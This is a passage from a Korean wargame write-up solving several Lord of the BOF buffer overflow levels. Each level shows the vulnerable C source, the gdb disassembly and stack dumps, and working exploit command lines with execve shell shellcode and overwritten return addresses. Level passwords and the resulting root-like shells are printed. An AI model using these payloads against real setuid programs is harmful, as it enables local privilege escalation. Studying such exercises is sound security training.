26 EGG = 0xbffffe45 gdb를이용해서분석을해보겠다. lob는 gdb를이용해서분석을못하므로 tmp디렉토리를만들어그곳에서분석을하겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,0x100 0x <main+9>: cmp DWORD PTR [%ebp+8],1 0x804843d <main+13>: jg 0x <main+38> 0x804843f <main+15>: push 0x80484e0 0x <main+20>: call 0x <printf> 0x <main+25>: add %esp,4 0x804844c <main+28>: push 0 0x804844e <main+30>: call 0x <exit> 0x <main+35>: add %esp,4 0x <main+38>: mov %eax,dword PTR [%ebp+12] 0x <main+41>: add %eax,4 0x804845c <main+44>: mov %edx,dword PTR [%eax] 0x804845e <main+46>: push %edx 0x804845f <main+47>: lea %eax,[%ebp-256] 0x <main+53>: push %eax 0x <main+54>: call 0x <strcpy> 0x804846b <main+59>: add %esp,8 0x804846e <main+62>: lea %eax,[%ebp-256] 0x <main+68>: push %eax 0x <main+69>: push 0x80484ec 0x804847a <main+74>: call 0x <printf> 0x804847f <main+79>: add %esp,8 0x <main+82>: leave 0x <main+83>: ret 0x <main+84>: nop 0x <main+85>: nop 0x <main+86>: nop 0x <main+87>: nop 0x <main+88>: nop 0x <main+89>: nop

27 0x804848a <main+90>: nop 0x804848b <main+91>: nop 0x804848c <main+92>: nop 0x804848d <main+93>: nop 0x804848e <main+94>: nop ---Type <return> to continue, or q <return> to quit--- 0x804848f <main+95>: nop End of assembler dump. buffer의위치가 ebp-256이라는것을알았다. buffer와 sfp를덮고, ret부분에환경변수의주소를쓰겠다. 쓰레기값 환경변수의주소공격을해보면 [gate@localhost tmp]$./gremlin `python -c "print '\x90'*260+'\x45\xfe\xff\xbf'"` Eþÿ bash$ 쉘이따지는것을확인했다. 그럼이것을본파일로가서하면 [gate@localhost gate]$./gremlin `python -c "print '\x90'*260+'\x45\xfe\xff\xbf'"` Eþÿ bash$ my-pass euid = 501 hello bof world LOB (gremlin ->cobolt) /* The Lord of the BOF : The Fellowship of the BOF - cobolt - small buffer */ int main(int argc, char *argv[]) { char buffer[16]; if(argc < 2){ printf("argv error\n"); exit(0);

28 strcpy(buffer, argv[1]); printf("%s\n", buffer); 1번문제와동일하지만 buffer의크기가작아졌다. 하지만우리는환경변수를이용하기때문에버퍼의크기는아무지장을주지않는다. 환경변수의주소를알아보겠다. gremlin]$ /tmp/ge EGG EGG = 0xbffffedb 복사해서 gdb 로분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,16 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804843a <main+10>: jg 0x <main+35> 0x804843c <main+12>: push 0x80484d0 0x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804844b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: mov %eax,dword PTR [%ebp+12] 0x <main+38>: add %eax,4 0x <main+41>: mov %edx,dword PTR [%eax] 0x804845b <main+43>: push %edx 0x804845c <main+44>: lea %eax,[%ebp-16] 0x804845f <main+47>: push %eax 0x <main+48>: call 0x <strcpy> 0x <main+53>: add %esp,8 0x <main+56>: lea %eax,[%ebp-16] 0x804846b <main+59>: push %eax 0x804846c <main+60>: push 0x80484dc 0x <main+65>: call 0x <printf> 0x <main+70>: add %esp,8 0x <main+73>: leave 0x804847a <main+74>: ret

29 0x804847b <main+75>: nop 0x804847c <main+76>: nop 0x804847d <main+77>: nop 0x804847e <main+78>: nop 0x804847f <main+79>: nop End of assembler dump. buffer 의시작이 ebp-16 이라는것을알았다. 쓰레기값 20 + 환경변수주소공격을하면 [gremlin@localhost tmp]$./cobolt `python -c "print 'A'*20+'\xdb\xfe\xff\xbf'"` AAAAAAAAAAAAAAAAAAAA ÿ bash$ 원본파일에서동일하게공격하면 [gremlin@localhost gremlin]$./cobolt `python -c "print 'A'*20+'\xdb\xfe\xff\xbf'"` AAAAAAAAAAAAAAAAAAAA ÿ bash$ my-pass euid = 502 hacking exposed LOB (cobolt -> goblin) /* */ The Lord of the BOF : The Fellowship of the BOF - goblin - small buffer + stdin int main() { char buffer[16]; gets(buffer); printf("%s\n", buffer); cobolt문제와비슷하지만이번에는입력을받는함수가 gets() 함수이다. FTZ에서연습했듯이 gets() 함수는함수로사용자의입력을받는함수이다. 따라서 pipe를이용한익스플로잇을해야한다,

30 이번문제도환경변수를이용하겠다. cobolt]$ /tmp/ge EGG EGG = 0xbffffedd 복사해서 gdb 로분석해보면 (gdb) disas main Dump of assembler code for function main: 0x80483f8 <main>: push %ebp 0x80483f9 <main+1>: mov %ebp,%esp 0x80483fb <main+3>: sub %esp,16 0x80483fe <main+6>: lea %eax,[%ebp-16] 0x <main+9>: push %eax 0x <main+10>: call 0x804830c <gets> 0x <main+15>: add %esp,4 0x804840a <main+18>: lea %eax,[%ebp-16] 0x804840d <main+21>: push %eax 0x804840e <main+22>: push 0x x <main+27>: call 0x804833c <printf> 0x <main+32>: add %esp,8 0x804841b <main+35>: leave 0x804841c <main+36>: ret 0x804841d <main+37>: nop 0x804841e <main+38>: nop 0x804841f <main+39>: nop End of assembler dump. buffer 가 ebp-16 에위치한다는것을알았다. 쓰레기값 20 + 환경변수의주소공격을해보면 [cobolt@localhost tmp]$ (python -c "print 'A'*20+'\xdd\xfe\xff\xbf'";cat)./goblin AAAAAAAAAAAAAAAAAAAAÿ id uid=502(cobolt) gid=502(cobolt) groups=502(cobolt) 원본파일을공격하면 [cobolt@localhost cobolt]$ (python -c "print 'A'*20+'\xdd\xfe\xff\xbf'";cat)./goblin

31 AAAAAAAAAAAAAAAAAAAAÿ my-pass euid = 503 hackers proof LOB (goblin -> orc) /* */ The Lord of the BOF : The Fellowship of the BOF - orc - egghunter #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer);

32 egghunter 부분에서환경변수를 memset() 함수로 0 으로초기화시킨다. 우리 에게는쉘코드를넣을수있는공간이환경변수말고도여러가지있다. 그 중하나인 argv[2] 부분에넣어보겠다. 복사를한후 gdb 로분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,44 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804850a <main+10>: jg 0x <main+35> 0x804850c <main+12>: push 0x x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804851b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: nop 0x <main+36>: mov DWORD PTR [%ebp-44],0x0 0x804852b <main+43>: nop 0x804852c <main+44>: lea %esi,[%esi*1] 0x <main+48>: mov %eax,dword PTR [%ebp-44] 0x <main+51>: lea %edx,[%eax*4] 0x804853a <main+58>: mov %eax,%ds:0x x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0 0x <main+67>: jne 0x <main+71> 0x <main+69>: jmp 0x <main+135> 0x <main+71>: mov %eax,dword PTR [%ebp-44] 0x804854a <main+74>: lea %edx,[%eax*4] 0x <main+81>: mov %eax,%ds:0x x <main+86>: mov %edx,dword PTR [%eax+%edx] 0x <main+89>: push %edx 0x804855a <main+90>: call 0x80483f0 <strlen> 0x804855f <main+95>: add %esp,4 0x <main+98>: mov %eax,%eax 0x <main+100>: push %eax 0x <main+101>: push 0 0x <main+103>: mov %eax,dword PTR [%ebp-44]

33 0x804856a <main+106>: lea %edx,[%eax*4] 0x <main+113>: mov %eax,%ds:0x x <main+118>: mov %edx,dword PTR [%eax+%edx] 0x <main+121>: push %edx 0x804857a <main+122>: call 0x <memset> ---Type <return> to continue, or q <return> to quit--- 0x804857f <main+127>: add %esp,12 0x <main+130>: inc DWORD PTR [%ebp-44] 0x <main+133>: jmp 0x <main+48> 0x <main+135>: mov %eax,dword PTR [%ebp+12] 0x804858a <main+138>: add %eax,4 0x804858d <main+141>: mov %edx,dword PTR [%eax] 0x804858f <main+143>: add %edx,47 0x <main+146>: cmp BYTE PTR [%edx],0xbf 0x <main+149>: je 0x80485b0 <main+176> 0x <main+151>: push 0x804863c 0x804859c <main+156>: call 0x <printf> 0x80485a1 <main+161>: add %esp,4 0x80485a4 <main+164>: push 0 0x80485a6 <main+166>: call 0x <exit> 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx 0x80485b9 <main+185>: lea %eax,[%ebp-40] 0x80485bc <main+188>: push %eax 0x80485bd <main+189>: call 0x <strcpy> 0x80485c2 <main+194>: add %esp,8 0x80485c5 <main+197>: lea %eax,[%ebp-40] 0x80485c8 <main+200>: push %eax 0x80485c9 <main+201>: push 0x x80485ce <main+206>: call 0x <printf> 0x80485d3 <main+211>: add %esp,8 0x80485d6 <main+214>: leave 0x80485d7 <main+215>: ret 0x80485d8 <main+216>: nop 0x80485d9 <main+217>: nop 0x80485da <main+218>: nop

34 0x80485db <main+219>: nop 0x80485dc <main+220>: nop 0x80485dd <main+221>: nop 0x80485de <main+222>: nop ---Type <return> to continue, or q <return> to quit--- 0x80485df <main+223>: nop End of assembler dump. main+185 부분을통해 buffer가 ebp-40이라는것을알았다. 그럼 argv[2] 를 nop로덮고그뒤에쉘코드를넣은후 ret을 nop의한지점으로설정해주겠다. (gdb) b * main+194 Breakpoint 1 at 0x80485c2 (gdb) r `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Starting program: /home/goblin/tmp/orc `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Breakpoint 1, 0x80485c2 in main () (gdb) x/100x $esp...( 생략 )... 0xbffffbc4: 0x x x x xbffffbd4: 0x x x x xbffffbe4: 0x682f0036 0x2f656d6f 0x6c626f67 0x742f6e69 0xbffffbf4: 0x6f2f706d 0xbf xbfbfbfbf 0xbfbfbfbf 0xbffffc04: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffc14: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffc24: 0xbfbfbfbf 0x00bfbfbf 0x x xbffffc34: 0x x x x xbffffc44: 0x x x x xbffffc54: 0x x x x xbffffc64: 0x x x x xbffffc74: 0x x x x xbffffc84: 0x x x x xbffffc94: 0x x x x xbffffca4: 0x x x x xbffffcb4: 0x x x x ( 생략 )... nop의주소를알았다. ret가 nop을가리키도록변조하면되겠다. 넉넉히 0xbffffc44로잡겠다.

35 쓰레기값 xbffffc44 + nop * shellcode 공격을하면 [goblin@localhost tmp]$./orc `python -c "print 'A'*44+'\x44\xfc\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD Segmentation fault (core dumped) 좀더정확하게 core 파일을분석하겠다. [goblin@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./orc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD'. Program terminated with signal 11, Segmentation fault. #0 0xbffffc4d in?? () (gdb) x/100x $esp...( 생략 )... 0xbffffb70: 0x x x x xbffffb80: 0x x x x xbffffb90: 0x x x x2f2e0036 0xbffffba0: 0x f 0x x x xbffffbb0: 0x x x x xbffffbc0: 0x x x x xbffffbd0: 0xbffffc44 0x x x xbffffbe0: 0x x x x xbffffbf0: 0x x x x xbffffc00: 0x x x x xbffffc10: 0x x x x xbffffc20: 0x x x x xbffffc30: 0x x x50c x732f2f68 0xbffffc40: 0x622f6868 0xe3896e69 0xe x0bb0d231...( 생략 )... 음 0xbffffbf0 로 ret 를덮어야겠다. [goblin@localhost tmp]$./orc `python -c "print 'A'*44+'\xf0\xfb\xff\xbf'"`

36 `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ 굳복사를해서똑같이하면 goblin]$./orc `python -c "print 'A'*44+'\xf0\xfb\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ id uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin) bash$ my-pass euid = 504 cantata core 파일을분석하면 segmentation error가발생했을때의시점에프로그램에기록된작업메모리를즉 esp와 ebp등여러레지스터상황을볼수있다. LOB /* */ (orc -> wolfman) The Lord of the BOF : The Fellowship of the BOF - wolfman - egghunter + buffer hunter #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0);

37 // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); buffer를 0으로초기화시킨다. 응안써하지만우리는 argv[2] 를사용해서풀것이기때문에크게상관없다. 이번에는아예좀더정확한분석을위해 core파일을일부러생성해풀어보겠다. 이제부터는디렉토리생성후복사하는과정은생략해도알아서하시길바란다. (gdb)disas main... 생략... 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx ---Type <return> to continue, or q <return> to quit--- 0x80485b9 <main+185>: lea %eax,[%ebp-40] 0x80485bc <main+188>: push %eax 0x80485bd <main+189>: call 0x <strcpy>... 생략... buffer가 ebp-40에위치한다는것을알았다. core파일을생성해보면 [orc@localhost tmp]$ ulimit -c unlimited [orc@localhost tmp]$./wolfman `python -c 'print "\xbf"*48'` `python -c "print

38 '\x90'*100"` Segmentation fault (core dumped) ulimit c unlimited 는 core 파일을생성해주는명령어이다. core 파일을분석해보면 [orc@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./wolfman '. Program terminated with signal 11, Segmentation fault. #0 0xbfbfbfbf in?? () (gdb) x/50x $esp 0xbffffe38: 0x000001f8 0x c 0x000001f8 0x d 0xbffffe48: 0x000001f8 0x e 0x000001f8 0x xbffffe58: 0x0fabfbff 0x f 0xbffffe86 0x xbffffe68: 0x x x x xbffffe78: 0x x x x xbffffe88: 0x2e x6c6f772f 0x6e616d66 0xbfbfbf00 0xbffffe98: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffea8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffeb8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0x909000bf 0xbffffec8: 0x x x x xbffffed8: 0x x x x xbffffee8: 0x x x x xbffffef8: 0x x xbffffec8로 ret를덮겠다. 쓰레기값 xbffffec8 + nop * shellcode [orc@localhost tmp]$./wolfman `python c print A *44+ \xc8\xfe\xff\xbf ` `python c print \x90 *100+ \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x

39 53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɾÿ Segmentation fault (core dumped) 세상은호락호락하지않다. core 파일을분석해보겠다. [orc@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./wolfman AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɾÿ '. Program terminated with signal 11, Segmentation fault. #0 0xbffffed1 in?? () (gdb) x/50x $esp 0xbffffdb8: 0x x x b 0x000001f8 0xbffffdc8: 0x c 0x000001f8 0x d 0x000001f8 0xbffffdd8: 0x e 0x000001f8 0x x0fabfbff 0xbffffde8: 0x f 0xbffffe19 0x x xbffffdf8: 0x x x x xbffffe08: 0x x x x xbffffe18: 0x x2f2e0036 0x666c6f77 0x006e616d 0xbffffe28: 0x x x x xbffffe38: 0x x x x xbffffe48: 0x x x xbffffec8 0xbffffe58: 0x x x x xbffffe68: 0x x x x xbffffe78: 0x x xbffffe78 로 ret 를덮겠다. [orc@localhost tmp]$./wolfman `python -c "print 'A'*44+'\x78\xfe\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x 8 9 \ x e 1 \ x 3 1 \ x d 2 \ x b 0 \ x 0 b \ x c d \ x 8 0 ' " ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxþÿ bash$ 쉘을획득! 똑같이해보면 [orc@localhost orc]$./wolfman `python -c "print 'A'*44+'\x78\xfe\xff\xbf'"`

40 `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x 8 9 \ x e 1 \ x 3 1 \ x d 2 \ x b 0 \ x 0 b \ x c d \ x 8 0 ' " ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxþÿ bash$ id uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc) bash$ my-pass euid = 505 love eyuna LOB (wolfman -> darkelf) /* */ The Lord of the BOF : The Fellowship of the BOF - darkelf - egghunter + buffer hunter + check length of argv[1] #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0);

41 // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); 전단계에서추가된점은 argv[1] 의길이를체크한다. 하지만우리는 argv[2] 를사용하면된다. 자빠르게 gdb 로분석한후풀어보자. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,44 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804850a <main+10>: jg 0x <main+35> 0x804850c <main+12>: push 0x x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804851b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: nop 0x <main+36>: mov DWORD PTR [%ebp-44],0x0 0x804852b <main+43>: nop 0x804852c <main+44>: lea %esi,[%esi*1] 0x <main+48>: mov %eax,dword PTR [%ebp-44] 0x <main+51>: lea %edx,[%eax*4] 0x804853a <main+58>: mov %eax,%ds:0x80497a4 0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0 0x <main+67>: jne 0x <main+71>

42 0x <main+69>: jmp 0x <main+135> 0x <main+71>: mov %eax,dword PTR [%ebp-44] 0x804854a <main+74>: lea %edx,[%eax*4] 0x <main+81>: mov %eax,%ds:0x80497a4 0x <main+86>: mov %edx,dword PTR [%eax+%edx] 0x <main+89>: push %edx 0x804855a <main+90>: call 0x80483f0 <strlen> 0x804855f <main+95>: add %esp,4 0x <main+98>: mov %eax,%eax 0x <main+100>: push %eax 0x <main+101>: push 0 0x <main+103>: mov %eax,dword PTR [%ebp-44] 0x804856a <main+106>: lea %edx,[%eax*4] 0x <main+113>: mov %eax,%ds:0x80497a4 0x <main+118>: mov %edx,dword PTR [%eax+%edx] 0x <main+121>: push %edx 0x804857a <main+122>: call 0x <memset> ---Type <return> to continue, or q <return> to quit--- 0x804857f <main+127>: add %esp,12 0x <main+130>: inc DWORD PTR [%ebp-44] 0x <main+133>: jmp 0x <main+48> 0x <main+135>: mov %eax,dword PTR [%ebp+12] 0x804858a <main+138>: add %eax,4 0x804858d <main+141>: mov %edx,dword PTR [%eax] 0x804858f <main+143>: add %edx,47 0x <main+146>: cmp BYTE PTR [%edx],0xbf 0x <main+149>: je 0x80485b0 <main+176> 0x <main+151>: push 0x804867c 0x804859c <main+156>: call 0x <printf> 0x80485a1 <main+161>: add %esp,4 0x80485a4 <main+164>: push 0 0x80485a6 <main+166>: call 0x <exit> 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx 0x80485b9 <main+185>: call 0x80483f0 <strlen> 0x80485be <main+190>: add %esp,4

43 0x80485c1 <main+193>: mov %eax,%eax 0x80485c3 <main+195>: cmp %eax,48 0x80485c6 <main+198>: jbe 0x80485e0 <main+224> 0x80485c8 <main+200>: push 0x x80485cd <main+205>: call 0x <printf> 0x80485d2 <main+210>: add %esp,4 0x80485d5 <main+213>: push 0 0x80485d7 <main+215>: call 0x <exit> 0x80485dc <main+220>: add %esp,4 0x80485df <main+223>: nop 0x80485e0 <main+224>: mov %eax,dword PTR [%ebp+12] 0x80485e3 <main+227>: add %eax,4 0x80485e6 <main+230>: mov %edx,dword PTR [%eax] 0x80485e8 <main+232>: push %edx 0x80485e9 <main+233>: lea %eax,[%ebp-40] 0x80485ec <main+236>: push %eax ---Type <return> to continue, or q <return> to quit--- 0x80485ed <main+237>: call 0x <strcpy> 0x80485f2 <main+242>: add %esp,8 0x80485f5 <main+245>: lea %eax,[%ebp-40] 0x80485f8 <main+248>: push %eax 0x80485f9 <main+249>: push 0x80486b0 0x80485fe <main+254>: call 0x <printf> 0x <main+259>: add %esp,8 0x <main+262>: push 40 0x <main+264>: push 0 0x804860a <main+266>: lea %eax,[%ebp-40] 0x804860d <main+269>: push %eax 0x804860e <main+270>: call 0x <memset> 0x <main+275>: add %esp,12 0x <main+278>: leave 0x <main+279>: ret 0x <main+280>: nop 0x <main+281>: nop 0x804861a <main+282>: nop 0x804861b <main+283>: nop 0x804861c <main+284>: nop 0x804861d <main+285>: nop 0x804861e <main+286>: nop 0x804861f <main+287>: nop

44 End of assembler dump. buffer가 ebp-40에위치한다는것을알았다. 이제 strcpy() 함수다음에 breakpoint를걸고 argv[2] 에 nop를넣어주소를알아내겠다. (gdb) b * main+242 Breakpoint 1 at 0x80485f2 (gdb) r `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Starting program: /home/wolfman/tmp/darkelf `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Breakpoint 1, 0x80485f2 in main () (gdb) x/50x $esp... 생략... 0xbffffbb4: 0xbf00666c 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbc4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbd4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbe4: 0x00bfbfbf 0x x x xbffffbf4: 0x x x x xbffffc04: 0x x x x xbffffc14: 0x x x x xbffffc24: 0x x x x xbffffc34: 0x x x x xbffffc44: 0x x x x xbffffc54: 0x x x x xbffffc64: 0x x x x xbffffc74: 0x x 생략... 0xbffffc04로 ret를덮겠다. 쓰레기값 xbffffc04 + nop + shellcode 공격을해보면 [wolfman@localhost tmp]$./darkelf `python -c "print 'A'*44+'\x04\xfc\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ 오이번엔깔끔하게쉘을획득했다. 원본파일에도공격을하면 [wolfman@localhost wolfman]$./darkelf `python -c "print 'A'*44+'\x04\xfc\xff\xbf'"` `python -c "print

45 '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ id uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman) bash$ my-pass euid = 506 kernel crashed LOB (darkelf -> orge) /* */ The Lord of the BOF : The Fellowship of the BOF - orge - check argv[0] #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // here is changed! if(strlen(argv[0])!= 77){ printf("argv[0] error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i]));

46 if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); 전단꼐와달라진점이있다면 argv[0] 의길이를 77로검사한다는것이다. 이럴때는심볼릭링크기능을사용하면해결할수있다. 심볼릭링크를이용해이름을 77만큼맞춘후 argv[2] 에 nop과 shellcode를넣어쉘을획득하겠다. 일단심볼릭링크를이용하는방법을알아야한다. [ln s 원본파일링크링크파일 ] 파일을복사해서분석해보겠다. [darkelf@localhost tmp]$ pwd /home/darkelf/tmp tmp 까지 17 개로이루어져있으니 / 를생각해서 A*59 를하면되겠다. [darkelf@localhost tmp]$ ln -s orge `python -c "print 'A'*59"` [darkelf@localhost tmp]$ ll total 16 lrwxrwxrwx 1 darkelf darkelf 4 May 20 22:38 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge -rwsr-sr-x 1 darkelf darkelf May 20 22:34 orge gdb 로분석하면 [darkelf@localhost tmp]$ gdb -q

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